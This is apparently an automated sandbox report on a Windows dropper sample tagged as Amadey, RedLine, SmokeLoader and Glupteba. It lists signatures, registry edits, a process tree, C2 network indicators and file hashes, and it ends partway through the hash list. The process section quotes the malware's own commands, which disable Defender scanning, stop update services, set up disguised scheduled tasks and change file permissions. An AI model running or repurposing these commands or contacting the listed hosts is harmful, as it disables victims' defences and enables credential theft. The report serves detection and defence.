Malware Analysis Report

2025-01-23 11:20

Sample ID 231010-zlyjpacb55
Target file
SHA256 e8c975487099db4ca2b7d9a1f0c3901d22ffa6c476ae796a100db99945c63620
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e8c975487099db4ca2b7d9a1f0c3901d22ffa6c476ae796a100db99945c63620

Threat Level: Known bad

The file was found to be: Known bad.

Malicious Activity Summary

SectopRAT

Detected google phishing page

Detects Healer, an antivirus disabler dropper

Glupteba

RedLine

Amadey

DcRat

Glupteba payload

Detect Mystic stealer payload

RedLine payload

Healer

SmokeLoader

Mystic

SectopRAT payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:48

Reported

2023-10-10 21:20

Platform

win7-20230831-en

Max time kernel

63s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

Healer

dropper healer

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BE45.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\AB2D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2752 set thread context of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A004D941-67B2-11EE-8654-7AF708EF84A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3064 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 2752 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2752 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\SysWOW64\WerFault.exe
PID 1260 wrote to memory of 2556 N/A N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe
PID 1260 wrote to memory of 2312 N/A N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe
PID 2556 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\AB2D.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe
PID 2768 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe
PID 2552 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe
PID 2312 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\B32A.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 36

C:\Users\Admin\AppData\Local\Temp\AB2D.exe

C:\Users\Admin\AppData\Local\Temp\AB2D.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\B32A.exe

C:\Users\Admin\AppData\Local\Temp\B32A.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 132

C:\Users\Admin\AppData\Local\Temp\B675.bat

"C:\Users\Admin\AppData\Local\Temp\B675.bat"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6C1.tmp\B6C2.tmp\B6C3.bat C:\Users\Admin\AppData\Local\Temp\B675.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 280

C:\Users\Admin\AppData\Local\Temp\B992.exe

C:\Users\Admin\AppData\Local\Temp\B992.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 132

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:536 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\BD3B.exe

C:\Users\Admin\AppData\Local\Temp\BD3B.exe

C:\Users\Admin\AppData\Local\Temp\BE45.exe

C:\Users\Admin\AppData\Local\Temp\BE45.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\EAF1.exe

C:\Users\Admin\AppData\Local\Temp\EAF1.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\AE1.exe

C:\Users\Admin\AppData\Local\Temp\AE1.exe

C:\Users\Admin\AppData\Local\Temp\260F.exe

C:\Users\Admin\AppData\Local\Temp\260F.exe

C:\Users\Admin\AppData\Local\Temp\2BCB.exe

C:\Users\Admin\AppData\Local\Temp\2BCB.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:536 CREDAT:603141 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {07F7C440-AE80-4FC0-B8CB-5E5B0312287B} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\aefshhe

C:\Users\Admin\AppData\Roaming\aefshhe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Roaming\fdfshhe

C:\Users\Admin\AppData\Roaming\fdfshhe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010212030.log C:\Windows\Logs\CBS\CbsPersist_20231010212030.cab

C:\Windows\system32\taskeng.exe

taskeng.exe {D61433FB-EC6E-4F2A-88A3-851D4946E65C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 accounts.youtube.com udp
US 108.177.126.113:443 accounts.youtube.com tcp
US 108.177.126.113:443 accounts.youtube.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
